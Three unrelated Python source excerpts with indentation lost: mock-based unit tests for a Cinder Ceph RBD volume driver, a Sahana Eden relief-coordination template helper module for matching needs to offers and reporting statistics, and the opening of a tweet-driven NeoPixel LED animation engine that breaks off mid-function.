self.mock_rados.Rados.connect.assert_called_once_with(timeout=1)
# error
self.mock_rados.Rados.open_ioctx.reset_mock()
self.mock_rados.Rados.shutdown.reset_mock()
self.mock_rados.Rados.open_ioctx.side_effect = self.mock_rados.Error
self.assertRaises(exception.VolumeBackendAPIException,
self.driver._connect_to_rados)
self.mock_rados.Rados.open_ioctx.assert_called_once()
self.mock_rados.Rados.shutdown.assert_called_once()
class RBDImageIOWrapperTestCase(test.TestCase):
def setUp(self):
super(RBDImageIOWrapperTestCase, self).setUp()
self.meta = mock.Mock()
self.meta.user = 'mock_user'
self.meta.conf = 'mock_conf'
self.meta.pool = 'mock_pool'
self.meta.image = mock.Mock()
self.meta.image.read = mock.Mock()
self.meta.image.write = mock.Mock()
self.meta.image.size = mock.Mock()
self.mock_rbd_wrapper = driver.RBDImageIOWrapper(self.meta)
self.data_length = 1024
self.full_data = 'abcd' * 256
def test_init(self):
self.assertEqual(self.mock_rbd_wrapper._rbd_meta, self.meta)
self.assertEqual(self.mock_rbd_wrapper._offset, 0)
def test_inc_offset(self):
self.mock_rbd_wrapper._inc_offset(10)
self.mock_rbd_wrapper._inc_offset(10)
self.assertEqual(self.mock_rbd_wrapper._offset, 20)
def test_rbd_image(self):
self.assertEqual(self.mock_rbd_wrapper.rbd_image, self.meta.image)
def test_rbd_user(self):
self.assertEqual(self.mock_rbd_wrapper.rbd_user, self.meta.user)
def test_rbd_pool(self):
self.assertEqual(self.mock_rbd_wrapper.rbd_conf, self.meta.conf)
def test_rbd_conf(self):
self.assertEqual(self.mock_rbd_wrapper.rbd_pool, self.meta.pool)
def test_read(self):
def mock_read(offset, length):
return self.full_data[offset:length]
self.meta.image.read.side_effect = mock_read
self.meta.image.size.return_value = self.data_length
data = self.mock_rbd_wrapper.read()
self.assertEqual(data, self.full_data)
data = self.mock_rbd_wrapper.read()
self.assertEqual(data, '')
self.mock_rbd_wrapper.seek(0)
data = self.mock_rbd_wrapper.read()
self.assertEqual(data, self.full_data)
self.mock_rbd_wrapper.seek(0)
data = self.mock_rbd_wrapper.read(10)
self.assertEqual(data, self.full_data[:10])
def test_write(self):
self.mock_rbd_wrapper.write(self.full_data)
self.assertEqual(self.mock_rbd_wrapper._offset, 1024)
def test_seekable(self):
self.assertTrue(self.mock_rbd_wrapper.seekable)
def test_seek(self):
self.assertEqual(self.mock_rbd_wrapper._offset, 0)
self.mock_rbd_wrapper.seek(10)
self.assertEqual(self.mock_rbd_wrapper._offset, 10)
self.mock_rbd_wrapper.seek(10)
self.assertEqual(self.mock_rbd_wrapper._offset, 10)
self.mock_rbd_wrapper.seek(10, 1)
self.assertEqual(self.mock_rbd_wrapper._offset, 20)
self.mock_rbd_wrapper.seek(0)
self.mock_rbd_wrapper.write(self.full_data)
self.meta.image.size.return_value = self.data_length
self.mock_rbd_wrapper.seek(0)
self.assertEqual(self.mock_rbd_wrapper._offset, 0)
self.mock_rbd_wrapper.seek(10, 2)
self.assertEqual(self.mock_rbd_wrapper._offset, self.data_length + 10)
self.mock_rbd_wrapper.seek(-10, 2)
self.assertEqual(self.mock_rbd_wrapper._offset, self.data_length - 10)
# test exceptions.
self.assertRaises(IOError, self.mock_rbd_wrapper.seek, 0, 3)
self.assertRaises(IOError, self.mock_rbd_wrapper.seek, -1)
# offset should not have been changed by any of the previous
# operations.
self.assertEqual(self.mock_rbd_wrapper._offset, self.data_length - 10)
def test_tell(self):
self.assertEqual(self.mock_rbd_wrapper.tell(), 0)
self.mock_rbd_wrapper._inc_offset(10)
self.assertEqual(self.mock_rbd_wrapper.tell(), 10)
def test_flush(self):
with mock.patch.object(driver, 'LOG') as mock_logger:
self.meta.image.flush = mock.Mock()
self.mock_rbd_wrapper.flush()
self.meta.image.flush.assert_called_once()
self.meta.image.flush.reset_mock()
# this should be caught and logged silently.
self.meta.image.flush.side_effect = AttributeError
self.mock_rbd_wrapper.flush()
self.meta.image.flush.assert_called_once()
msg = _("flush() not supported in this version of librbd")
mock_logger.warning.assert_called_with(msg)
def test_fileno(self):
self.assertRaises(IOError, self.mock_rbd_wrapper.fileno)
def test_close(self):
self.mock_rbd_wrapper.close()
class ManagedRBDTestCase(DriverTestCase):
driver_name = "cinder.volume.drivers.rbd.RBDDriver"
def setUp(self):
super(ManagedRBDTestCase, self).setUp()
# TODO(dosaboy): need to remove dependency on mox stubs here once
# image.fake has been converted to mock.
fake_image.stub_out_image_service(self.stubs)
self.volume.driver.set_initialized()
self.volume.stats = {'allocated_capacity_gb': 0,
'pools': {}}
self.called = []
def _create_volume_from_image(self, expected_status, raw=False,
clone_error=False):
"""Try to clone a volume from an image, and check the status
afterwards.
NOTE: if clone_error is True we force the image type to raw otherwise
clone_image is not called
"""
volume_id = 1
# See tests.image.fake for image types.
if raw:
image_id = '155d900f-4e14-4e4c-a73d-069cbf4541e6'
else:
image_id = 'c905cedb-7281-47e4-8a62-f26bc5fc4c77'
# creating volume testdata
db.volume_create(self.context,
{'id': volume_id,
'updated_at': timeutils.utcnow(),
'display_description': 'Test Desc',
'size': 20,
'status': 'creating',
'instance_uuid': None,
'host': 'dummy'})
try:
if not clone_error:
self.volume.create_volume(self.context,
volume_id,
image_id=image_id)
else:
self.assertRaises(exception.CinderException,
self.volume.create_volume,
self.context,
volume_id,
image_id=image_id)
volume = db.volume_get(self.context, volume_id)
self.assertEqual(volume['status'], expected_status)
finally:
# cleanup
db.volume_destroy(self.context, volume_id)
def test_create_vol_from_image_status_available(self):
"""Clone raw image then verify volume is in available state."""
def _mock_clone_image(volume, image_location, image_id, image_meta):
return {'provider_location': None}, True
with mock.patch.object(self.volume.driver, 'clone_image') as \
mock_clone_image:
mock_clone_image.side_effect = _mock_clone_image
with mock.patch.object(self.volume.driver, 'create_volume') as \
mock_create:
with mock.patch.object(create_volume.CreateVolumeFromSpecTask,
'_copy_image_to_volume') as mock_copy:
self._create_volume_from_image('available', raw=True)
self.assertFalse(mock_copy.called)
mock_clone_image.assert_called_once()
self.assertFalse(mock_create.called)
def test_create_vol_from_non_raw_image_status_available(self):
"""Clone non-raw image then verify volume is in available state."""
def _mock_clone_image(volume, image_location, image_id, image_meta):
return {'provider_location': None}, False
with mock.patch.object(self.volume.driver, 'clone_image') as \
mock_clone_image:
mock_clone_image.side_effect = _mock_clone_image
with mock.patch.object(self.volume.driver, 'create_volume') as \
mock_create:
with mock.patch.object(create_volume.CreateVolumeFromSpecTask,
'_copy_image_to_volume') as mock_copy:
self._create_volume_from_image('available', raw=False)
mock_copy.assert_called_once()
mock_clone_image.assert_called_once()
mock_create.assert_called_once()
def test_create_vol_from_image_status_error(self):
"""Fail to clone raw image then verify volume is in error state."""
with mock.patch.object(self.volume.driver, 'clone_image') as \
mock_clone_image:
mock_clone_image.side_effect = exception.CinderException
with mock.patch.object(self.volume.driver, 'create_volume'):
with mock.patch.object(create_volume.CreateVolumeFromSpecTask,
'_copy_image_to_volume') as mock_copy:
self._create_volume_from_image('error', raw=True,
clone_error=True)
self.assertFalse(mock_copy.called)
mock_clone_image.assert_called_once()
self.assertFalse(self.volume.driver.create_volume.called)
def test_clone_failure(self):
driver = self.volume.driver
with mock.patch.object(driver, '_is_cloneable', lambda *args: False):
image_loc = (mock.Mock(), mock.Mock())
actual = driver.clone_image(mock.Mock(), image_loc,
mock.Mock(), {})
self.assertEqual(({}, False), actual)
self.assertEqual(({}, False),
driver.clone_image(object(), None, None, {}))
def test_clone_success(self):
expected = ({'provider_location': None}, True)
driver = self.volume.driver
with mock.patch.object(self.volume.driver, '_is_cloneable') as \
mock_is_cloneable:
mock_is_cloneable.return_value = True
with mock.patch.object(self.volume.driver, '_clone') as \
mock_clone:
with mock.patch.object(self.volume.driver, '_resize') as \
mock_resize:
image_loc = ('rbd://fee/fi/fo/fum', None)
actual = driver.clone_image({'name': 'vol1'}, image_loc,
'id.foo',
{'disk_format': 'raw'})
self.assertEqual(expected, actual)
mock_clone.assert_called_once()
mock_resize.assert_called_once()
| |
# -*- coding: utf-8 -*-
"""
Helper functions and classes for RLPCM template
@license: MIT
"""
import datetime
import json
import os
from gluon import current, A, DIV, LI, SPAN, UL
from s3 import FS, ICON, S3DateFilter, S3Represent, s3_str, s3_yes_no_represent
from s3db.pr import pr_PersonEntityRepresent
# =============================================================================
def get_role_realms(role):
"""
Get all realms for which a role has been assigned
@param role: the role ID or role UUID
@returns: list of pe_ids the current user has the role for,
None if the role is assigned site-wide, or an
empty list if the user does not have the role, or
no realm for the role
"""
db = current.db
auth = current.auth
s3db = current.s3db
if isinstance(role, str):
gtable = auth.settings.table_group
query = (gtable.uuid == role) & \
(gtable.deleted == False)
row = db(query).select(gtable.id,
cache = s3db.cache,
limitby = (0, 1),
).first()
role_id = row.id if row else None
else:
role_id = role
role_realms = []
user = auth.user
if user:
role_realms = user.realms.get(role_id, role_realms)
return role_realms
# =============================================================================
def get_managed_orgs(role):
"""
Get the organisations for which the current user has a role
@param role: the role id or UUID
@returns: list of organisation pe_ids
"""
db = current.db
s3db = current.s3db
role_realms = get_role_realms(role)
etable = s3db.pr_pentity
query = (etable.instance_type == "org_organisation")
if role_realms is not None:
query = (etable.pe_id.belongs(role_realms)) & query
rows = db(query).select(etable.pe_id)
return [row.pe_id for row in rows]
# =============================================================================
def get_current_events(record):
"""
Look up all current events
@param record: include the event_id of this record even
if the event is closed
@returns: list of event_ids, most recent first
"""
db = current.db
s3db = current.s3db
table = s3db.event_event
query = (table.closed == False)
if record:
query |= (table.id == record.event_id)
query &= (table.deleted == False)
rows = db(query).select(table.id,
orderby = ~table.start_date,
)
return [row.id for row in rows]
# =============================================================================
def get_current_location(person_id=None):
"""
Look up the current tracking location of a person
@param person_id: the person ID (defaults to logged-in person)
@returns: the ID of the lowest-level Lx of the current
tracking location of the person
"""
if not person_id:
person_id = current.auth.s3_logged_in_person()
from s3 import S3Trackable
trackable = S3Trackable(tablename="pr_person", record_id=person_id)
# Look up the location
location = trackable.get_location()
if not location:
return None
if isinstance(location, list):
location = location[0]
# Return only Lx
if location.level:
return location.id
else:
return location.parent
# =============================================================================
def get_offer_filters(person_id=None):
"""
Get filters for br_assistance_offer matching a person's
current needs
@param person_id: the person ID
@returns: S3ResourceQuery to apply to an br_assistance_offer
resource, or None, if matching is not possible
# TODO move client-side
"""
db = current.db
auth = current.auth
s3db = current.s3db
if not person_id:
person_id = auth.s3_logged_in_person()
if not person_id:
return None
# Lookup all current needs of the person
atable = s3db.br_case_activity
ltable = s3db.gis_location
ptable = s3db.pr_person
stable = s3db.br_case_activity_status
today = current.request.utcnow.date()
join = [ptable.on(ptable.id == atable.person_id),
stable.on((stable.id == atable.status_id) & \
(stable.is_closed == False)),
]
left = ltable.on(ltable.id == atable.location_id)
query = (atable.person_id == person_id) & \
(atable.need_id != None) & \
(atable.location_id != None) & \
((atable.date == None) | (atable.date <= today)) & \
((atable.end_date == None) | (atable.end_date >= today)) & \
(atable.deleted == False)
rows = db(query).select(atable.need_id,
atable.location_id,
ltable.name,
#ltable.parent,
ltable.level,
ltable.path,
ptable.pe_id,
join = join,
left = left,
)
gis = current.gis
get_neighbours = gis.get_neighbours
get_parents = gis.get_parents
filters, exclude_provider = None, None
for row in rows:
# Provider to exclude
person = row.pr_person
exclude_provider = person.pe_id
activity = row.br_case_activity
# Match by need
query = FS("~.need_id") == activity.need_id
# Match by Location
# - include exact match if Need is at an Lx
# - include all higher level Lx
# - include all adjacent lowest-level Lx
location_id = activity.location_id
location = row.gis_location
level = location.level
if level:
# Lx location (the normal case)
location_ids = [location_id]
# Include all parent Lx
parents = get_parents(location_id, feature=location, ids_only=True)
if parents:
location_ids += parents
# Include all adjacent Lx of the same level
neighbours = get_neighbours(location_id)
if neighbours:
location_ids += neighbours
else:
# Specific address
location_ids = []
# Include all parent Lx
parents = get_parents(location_id, feature=location, ids_only=True)
if parents:
location_ids = parents
# Include all adjacent Lx of the immediate ancestor Lx
neighbours = get_neighbours(parents[0])
if neighbours:
location_ids += neighbours
# Lookup the immediate ancestor's level
q = (ltable.id == parents[0]) & (ltable.deleted == False)
row = db(q).select(ltable.level, limitby=(0, 1)).first()
if row:
level = row.level
if location_ids and level and level < "L4":
# Include all child Lx of the match locations below level
# TODO make this recursive to include grandchildren etc. too
q = (ltable.parent.belongs(location_ids)) & \
(ltable.level != None) & \
(ltable.level > level) & \
(ltable.deleted == False)
children = db(q).select(ltable.id)
location_ids += [c.id for c in children]
if location_ids:
if len(location_ids) == 1:
q = FS("~.location_id") == list(location_ids)[0]
else:
q = FS("~.location_id").belongs(location_ids)
query = (query & q) if query else q
else:
continue
filters = (filters | query) if filters else query
if not filters:
# Show no results if the user has no needs reported
return FS("id").belongs(set())
# Exclude the person's own offers
if exclude_provider:
filters &= FS("~.pe_id") != exclude_provider
return filters
# =============================================================================
class ProviderRepresent(pr_PersonEntityRepresent):
def __init__(self, as_string=False):
"""
Constructor
@param show_label: show the ID tag label for persons
@param default_label: the default for the ID tag label
@param show_type: show the instance_type
@param multiple: assume a value list by default
"""
self.as_string = as_string
super(ProviderRepresent, self).__init__(show_label = False,
show_type = False,
)
# -------------------------------------------------------------------------
def represent_row(self, row):
"""
Represent a row
@param row: the Row
"""
pentity = row.pr_pentity
instance_type = pentity.instance_type
item = object.__getattribute__(row, instance_type)
if instance_type == "pr_person":
if self.as_string:
pe_str = current.T("private")
else:
pe_str = SPAN(current.T("private"), _class="free-hint")
elif "name" in item:
pe_str = s3_str(item["name"])
else:
pe_str = "?"
return pe_str
# =============================================================================
class OverviewData(object):
"""
Data extraction for overview page
"""
# Color palette for categories
# - same category should use the same color in all contexts
palette = [
"ffff00", "ff5500", "55aaff", "aaaa00", "939393", "8b2e8b",
"1f6c6d", "b31c1c", "ff995e", "457624", "550000", "005500",
"00007f", "006898", "7777b3", "e1cb74", "100000", "001000",
"000010", "5500ff", "ffaaff", "00aa7f", "ffaa7f", "3f3f3f",
"00aaff", "74aa1d", "b30000", "7e547e", "274214", "55007f",
"0c9cd0", "e03158", "fba629", "8abc3f", "afb8bf",
]
# -------------------------------------------------------------------------
@classmethod
def get_color(cls, category):
"""
Get a color from the palette
@param category: an integer representing the category
@returns: CSS hex color (string)
"""
palette = cls.palette
return "#%s" % (palette[category % len(palette)])
# -------------------------------------------------------------------------
@classmethod
def needs_by_category(cls):
"""
Count current case activities by need type
"""
db = current.db
s3db = current.s3db
atable = s3db.br_case_activity
stable = s3db.br_case_activity_status
join = stable.on((stable.id == atable.status_id) & \
(stable.is_closed == False))
today = current.request.utcnow.date()
query = ((atable.date == None) | (atable.date <= today)) & \
((atable.end_date == None) | (atable.end_date >= today)) & \
(atable.person_id != None) & \
(atable.need_id != None) & \
(atable.deleted == False)
number = atable.id.count()
rows = db(query).select(atable.need_id,
number,
join = join,
groupby = atable.need_id,
orderby = ~number,
limitby = (0, 5),
)
represent = atable.need_id.represent
labels = represent.bulk([row.br_case_activity.need_id for row in rows])
values = []
for row in rows:
value = row[number]
need_id = row.br_case_activity.need_id
need = labels.get(need_id)
values.append({"label": str(need),
"color": cls.get_color(need_id),
"value": value if value else 0,
})
return [{"key": s3_str(current.T("Current Need Reports")),
"values": values,
},
]
# -------------------------------------------------------------------------
@classmethod
def offers_by_category(cls):
"""
Count current assistance offers by need type
"""
db = current.db
s3db = current.s3db
atable = s3db.br_assistance_offer
today = current.request.utcnow.date()
query = (atable.status == "APR") & \
(atable.availability == "AVL") & \
((atable.date == None) | (atable.date <= today)) & \
((atable.end_date == None) | (atable.end_date >= today)) & \
(atable.pe_id != None) & \
(atable.need_id != None) & \
(atable.deleted == False)
number = atable.id.count()
rows = db(query).select(atable.need_id,
number,
groupby = atable.need_id,
orderby = ~number,
limitby = (0, 5),
)
represent = atable.need_id.represent
labels = represent.bulk([row.br_assistance_offer.need_id for row in rows])
values = []
for row in rows:
value = row[number]
need_id = row.br_assistance_offer.need_id
need = labels.get(need_id)
values.append({"label": str(need),
"color": cls.get_color(need_id),
"value": value if value else 0,
})
return [{"key": s3_str(current.T("Current Relief Offers")),
"values": values,
},
]
# -------------------------------------------------------------------------
@classmethod
def usage_statistics(cls):
"""
Establish site usage statistics
@returns: the usage stats, a dict:
{"au": 0, # Number of active users
"ao": 0, # Number of active organisations
"nr": 0, # Number of active need reports
"ro": 0, # Number of active assistance offers
"pn": 0, # Number of people with needs reported
"po": 0, # Number of users offering help
}
"""
db = current.db
auth = current.auth
s3db = current.s3db
data = {}
today = current.request.utcnow
two_days_back = today - datetime.timedelta(days=2)
utable = auth.settings.table_user
gtable = auth.settings.table_group
mtable = auth.settings.table_membership
active_user = ((utable.registration_key == None) | (utable.registration_key == "")) & \
(utable.timestmp > two_days_back) & \
(utable.deleted == False)
# Get the number of active users
join = [mtable.on((mtable.user_id == utable.id) &
(mtable.deleted == False)),
gtable.on((gtable.id == mtable.group_id) & \
(gtable.uuid.belongs(("CITIZEN", "RELIEF_PROVIDER"))))
]
query = active_user
number = utable.id.count()
row = db(query).select(number, join=join).first()
if row:
data["au"] = row[number]
# Get the number of active organisations
htable = s3db.hrm_human_resource
ptable = s3db.pr_person
ltable = s3db.pr_person_user
join = [ptable.on(ptable.id == htable.person_id),
ltable.on((ltable.pe_id == ptable.pe_id) & \
(ltable.deleted == False)),
utable.on((utable.id == ltable.user_id) & \
active_user),
mtable.on((mtable.user_id == utable.id) &
(mtable.deleted == False)),
gtable.on((gtable.id == mtable.group_id) & \
(gtable.uuid == "RELIEF_PROVIDER")),
]
number = htable.organisation_id.count()
row = db(query).select(number, join=join).first()
if row:
data["ao"] = row[number]
# Count current need reports and distinct beneficiaries
atable = s3db.br_case_activity
stable = s3db.br_case_activity_status
join = stable.on((stable.id == atable.status_id) & \
(stable.is_closed == False))
query = ((atable.date == None) | (atable.date <= today)) & \
((atable.end_date == None) | (atable.end_date >= today)) & \
(atable.deleted == False)
number = atable.id.count()
persons = atable.person_id.count(distinct=True)
row = db(query).select(number, persons, join=join).first()
if row:
data["nr"] = row[number]
data["pn"] = row[persons]
# Count current assistance offers and distinct providers
otable = s3db.br_assistance_offer
query = (otable.status == "APR") & \
(otable.availability != "RTD") & \
((otable.date == None) | (otable.date <= today)) & \
((otable.end_date == None) | (otable.end_date >= today)) & \
(otable.deleted == False)
number = otable.id.count()
persons = otable.pe_id.count(distinct=True)
row = db(query).select(number, persons).first()
if row:
data["ro"] = row[number]
data["po"] = row[persons]
return data
# -------------------------------------------------------------------------
@classmethod
def update_data(cls):
"""
Update data files for overview page
NB requires write-permission for static/data/RLP folder+files
"""
current.log.debug("Updating overview data")
SEPARATORS = (",", ":")
os_path_join = os.path.join
json_dump = json.dump
base = os_path_join(current.request.folder, "static", "data", "RLP")
path = os_path_join(base, "rlpcm_needs.json")
data = cls.needs_by_category()
with open(path, "w") as outfile:
json_dump(data, outfile, separators=SEPARATORS)
path = os_path_join(base, "rlpcm_offers.json")
data = cls.offers_by_category()
with open(path, "w") as outfile:
json_dump(data, outfile, separators=SEPARATORS)
path = os_path_join(base, "rlpcm_usage.json")
data = cls.usage_statistics()
with open(path, "w") as outfile:
json_dump(data, outfile, separators=SEPARATORS)
# =============================================================================
class OfferDetails(object):
"""
Field methods for compact representation of place and
contact information of offers
"""
# -------------------------------------------------------------------------
@staticmethod
def place(row):
if hasattr(row, "gis_location"):
location = row.gis_location
else:
location = row
return tuple(location.get(level)
for level in ("L3", "L2", "L1"))
# -------------------------------------------------------------------------
@staticmethod
def place_represent(value, row=None):
if isinstance(value, tuple) and len(value) == 3:
l3 = value[0]
lx = tuple(n if n else "-" for n in value[1:])
output = DIV(_class = "place-repr",
)
if l3:
output.append(DIV(l3,
_class = "place-name",
))
if lx:
output.append(DIV("%s / %s" % lx,
_class = "place-info",
))
return output
else:
return value if value else "-"
# -------------------------------------------------------------------------
@staticmethod
def contact(row):
if hasattr(row, "br_assistance_offer"):
offer = row.br_assistance_offer
else:
offer = row
return tuple(offer.get(detail)
for detail in ("contact_name",
"contact_phone",
"contact_email",
))
# -------------------------------------------------------------------------
@staticmethod
def contact_represent(value, row=None):
if isinstance(value, tuple) and len(value) == 3:
if not any(value):
return ""
name, phone, email = value
output = DIV(_class = "contact-repr",
)
if name:
output.append(SPAN(name,
_class = "contact-name",
))
if email or phone:
details = DIV(_class="contact-details")
if phone:
details.append(DIV(ICON("phone"),
SPAN(phone,
_class = "contact-phone"),
_class = "contact-info",
))
if email:
details.append(DIV(ICON("mail"),
SPAN(A(email,
_href="mailto:%s" % email,
),
_class = "contact-email"),
_class = "contact-info",
))
output.append(details)
return output
else:
return value if value else "-"
# =============================================================================
class OfferAvailabilityFilter(S3DateFilter):
"""
Date-Range filter with custom variable
- without this then we parse as a vfilter which clutters error console
& is inefficient (including preventing a bigtable optimisation)
"""
@classmethod
def _variable(cls, selector, operator):
return super()._variable("$$available", operator)
# -------------------------------------------------------------------------
@staticmethod
def apply_filter(resource, get_vars):
"""
Filter out offers that
- become available only after a start date, or
- become unavailable before an end date
(reversed logic compared to a normal range filter)
"""
parse_dt = current.calendar.parse_date
from_date = parse_dt(get_vars.get("$$available__ge"))
to_date = parse_dt(get_vars.get("$$available__le"))
if from_date:
query = (FS("date") == None) | (FS("date") <= from_date)
resource.add_filter(query)
if to_date:
query = (FS("end_date") == None) | (FS("end_date") >= to_date)
resource.add_filter(query)
# =============================================================================
class ShelterDetails(OfferDetails):
"""
Field methods for compact representation of place and
contact information of shelters
"""
# -------------------------------------------------------------------------
@staticmethod
def contact(row):
if hasattr(row, "cr_shelter"):
offer = row.cr_shelter
else:
offer = row
return tuple(offer.get(detail)
for detail in ("contact_name",
"phone",
"email",
))
# =============================================================================
class ServiceListRepresent(S3Represent):
always_list = True
def render_list(self, value, labels, show_link=True):
"""
Helper method to render list-type representations from
bulk()-results.
@param value: the list
@param labels: the labels as returned from bulk()
@param show_link: render references as links, should
be the same as used with bulk()
"""
show_link = show_link and self.show_link
values = [v for v in value if v is not None]
if not len(values):
return ""
if show_link:
labels_ = (labels[v] if v in labels else self.default for v in values)
else:
labels_ = sorted(s3_str(labels[v]) if v in labels else self.default for v in values)
if current.auth.permission.format == "xls":
return ", ".join(labels_)
html = UL(_class="service-list")
for label in labels_:
html.append(LI(label))
return html
# =============================================================================
def restrict_data_formats(r):
"""
Restrict data exports (prevent S3XML/S3JSON of records)
@param r: the S3Request
"""
settings = current.deployment_settings
allowed = ("html", "iframe", "popup", "aadata", "plain", "geojson", "pdf", "xls")
if r.method in ("report", "timeplot", "filter"):
allowed += ("json",)
if r.method == "options":
allowed += ("s3json",)
settings.ui.export_formats = ("pdf", "xls")
if r.representation not in allowed:
r.error(403, current.ERROR.NOT_PERMITTED)
# =============================================================================
def notify_direct_offer(record_id):
"""
Send notification to activity manager about a direct offer
@param record_id: the direct offer record ID
@returns: error message if failed, otherwise None
"""
T = current.T
db = current.db
s3db = current.s3db
table = s3db.br_direct_offer
today = current.request.utcnow.date()
atable = s3db.br_case_activity
stable = s3db.br_case_activity_status
aotable = s3db.br_assistance_offer
join = [atable.on((atable.id == table.case_activity_id) & \
(atable.deleted == False)),
stable.on((stable.id == atable.status_id) & \
(stable.is_closed == False)),
aotable.on((aotable.id == table.offer_id) & \
(aotable.status != "BLC") & \
((aotable.end_date == None) | (aotable.end_date >= today)) & \
(aotable.deleted == False)),
]
query = (table.id == record_id) & \
(table.notify == True) & \
(table.notified_on == None) & \
(table.deleted == False)
row = db(query).select(table.id,
table.case_activity_id,
table.offer_id,
atable.person_id,
atable.subject,
join = join,
limitby = (0, 1),
).first()
if not row:
return None
direct_offer = row.br_direct_offer
case_activity = row.br_case_activity
# Determine recipient
recipient = None
user_id = current.auth.s3_get_user_id(case_activity.person_id)
if user_id:
# Look up the user's email address
ltable = s3db.pr_person_user
ctable = s3db.pr_contact
join = ctable.on((ctable.pe_id == ltable.pe_id) & \
(ctable.contact_method == "EMAIL") & \
(ctable.deleted == False))
query = (ltable.user_id == user_id) & \
(ltable.deleted == False)
row = db(query).select(ctable.value,
join = join,
orderby = ctable.priority,
limitby = (0, 1),
).first()
if row:
recipient = row.value
else:
# Look up the case org
ctable = s3db.br_case
query = (ctable.person_id == case_activity.person_id) & \
(ctable.deleted == False)
row = db(query).select(ctable.organisation_id,
limitby = (0, 1),
).first()
if row:
organisation_id = row.organisation_id
else:
return T("Case Organisation not found")
# Look up the email addresses of CASE_MANAGERs
from templates.RLPPTM.helpers import get_role_emails
recipient = get_role_emails("CASE_MANAGER",
organisation_id = organisation_id,
)
if not recipient:
# Fall back
recipient = get_role_emails("RELIEF_PROVIDER",
organisation_id = organisation_id,
)
if not recipient:
return T("No suitable recipient for notification found")
if isinstance(recipient, list) and len(recipient) == 1:
recipient = recipient[0]
# Lookup data for notification
ltable = s3db.gis_location
left = ltable.on(ltable.id == aotable.location_id)
query = (aotable.id == direct_offer.offer_id)
row = db(query).select(aotable.id,
aotable.pe_id,
aotable.refno,
aotable.name,
aotable.description,
aotable.chargeable,
aotable.contact_name,
aotable.contact_phone,
aotable.contact_email,
aotable.date,
aotable.end_date,
aotable.availability,
ltable.id,
ltable.L3,
ltable.L1,
left = left,
limitby = (0, 1),
).first()
offer = row.br_assistance_offer
location = row.gis_location
provider = ProviderRepresent(as_string=True)(offer.pe_id)
availability_opts = dict(s3db.br_assistance_offer_availability)
availability = availability_opts.get(offer.availability, "-")
public_url = current.deployment_settings.get_base_public_url()
appname = current.request.application
base_url = "%s/%s" % (public_url, appname)
data = {"provider": s3_str(provider),
"title": offer.name,
"details": offer.description,
"refno": offer.refno,
"name": offer.contact_name,
"phone": offer.contact_phone,
"email": offer.contact_email,
"chargeable": s3_yes_no_represent(offer.chargeable),
"available_from": aotable.date.represent(offer.date),
"available_until": aotable.end_date.represent(offer.end_date),
"availability": s3_str(availability),
"offer_url": "%s/br/offers/%s" % (base_url, direct_offer.offer_id),
"need_url": "%s/br/case_activity/%s" % (base_url, direct_offer.case_activity_id),
"subject": case_activity.subject,
}
if location.id:
data["place"] = "%s (%s)" % (location.L3 or "-",
location.L1 or "-",
)
# Send notification
from templates.RLPPTM.notifications import CMSNotifications
error = CMSNotifications.send(recipient,
"DirectOfferNotification",
data,
module = "br",
resource = "direct_offer",
)
if not error:
# Set notified_on
direct_offer.update_record(notified_on = datetime.datetime.utcnow,
modified_on = table.modified_on,
modified_by = table.modified_by,
)
return error
# END =========================================================================
| |
import time
import random
import threading
from neopixel import *
from conf import *
def getRandomColor(colorsList):
"""Returns a random color from <colorsList> or OFF"""
if len(colorsList) > 0:
return colorsList[random.randint(0, len(colorsList)-1)]
return 0, 0, 0
def getDimmedRGB(color, alpha=255):
"""Returns dimmed RGB values, with low and high pass to ensure LEDs are fully off or on"""
if alpha >= 253: # int is 1
return color
elif alpha <= 2: # int is 0
return 0, 0, 0
else:
p = alpha/255.0
r, g, b = color
return int(r*p), int(g*p), int(b*p)
class NeoPixelEngine:
"""Pushes animations to hardware NeoPixel array based on the number of tweets & special tweets found"""
def __init__(self):
print("[!] Starting NeoPixel Engine ...")
random.seed(time.time())
# Set up Neopixel Strip
self.strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS)
self.strip.begin()
# start refresh Thread
self.refresh = threading.Thread(target=self.refreshStrip, args=(1.0/LED_UPDATE_FREQ,))
self.refresh.setDaemon(True)
self.isAlive = True
self.refresh.start()
def stop(self):
self.isAlive = False
self.refresh.join()
def animate(self, tweets, specials):
"""Wrapper for Animate thread handler"""
random.seed(time.time())
threading.Thread(target=self.animateThread, args=(tweets, specials,)).start()
def animateThread(self, tweets, specials):
"""Chooses how to animate the hardware array, based on the number of tweets and special tweets"""
if specials > 0:
# Special tweet found
self.whiteTwinkle()
elif tweets >= 0:
if (float(tweets)/LED_COUNT) > 0.9:
# Almost saturated
self.pickRandomSpecialAnimation()
elif (float(tweets)/LED_COUNT) < 0.1:
# Hardly any
self.pickRandomGlow()
else:
# Moderate amount
self.flashRandom(tweets)
## ---- Animations -------------------------------------------------------------------------------------------------
def pickRandomSpecialAnimation(self):
random.seed(time.time())
random.choice([
self.solidColorWipe,
self.randomColorWipe,
self.solidColorTwinkle,
self.randomColorTwinkle,
self.solidColorLadder,
self.randomColorLadder,
self.candyCane
])()
def pickRandomGlow(self):
random.seed(time.time())
random.choice([
self.solidColorGlow,
self.randomColorGlow
])(15)
def showcaseAnimations(self):
"""Runs through all the animations in the class, for test & showcase"""
self.flashRandom(LED_COUNT)
self.solidColorWipe()
time.sleep(POLL_FREQUENCY/2)
self.randomColorWipe()
time.sleep(POLL_FREQUENCY/2)
self.solidColorTwinkle()
self.whiteTwinkle()
self.randomColorTwinkle()
self.solidColorGlow(25)
time.sleep(POLL_FREQUENCY)
self.randomColorGlow(25)
time.sleep(POLL_FREQUENCY)
self.solidColorLadder()
self.randomColorLadder()
self.candyCane()
time.sleep(POLL_FREQUENCY/2)
def flashRandom(self, number):
"""Flashes <number> random pixels a random color from SUCCESS_COLORS"""
wait_s = float(POLL_FREQUENCY) / number
hold = min(wait_s, 1.0)
addrs = random.sample(range(0, LED_COUNT), number)
for i in range(0, number):
if (((i+1)*hold)+0.5) <= POLL_FREQUENCY: # SO led don't overextend
self.flash([addrs[i]], getRandomColor(SUCCESS_COLORS), hold=hold)
time.sleep(wait_s)
def solidColorWipe(self):
"""Wipes the same random color from SUCCESS_COLORS up the array"""
color = getRandomColor(SUCCESS_COLORS)
wait_s = float(POLL_FREQUENCY / (LED_COUNT * 2.0))
hold = (POLL_FREQUENCY * 0.5)
for i in range(0, LED_COUNT):
self.flash([i], color, fade_in=(0.2*hold), hold=(0.6*hold), fade_out=(0.2*hold))
time.sleep(wait_s)
def randomColorWipe(self):
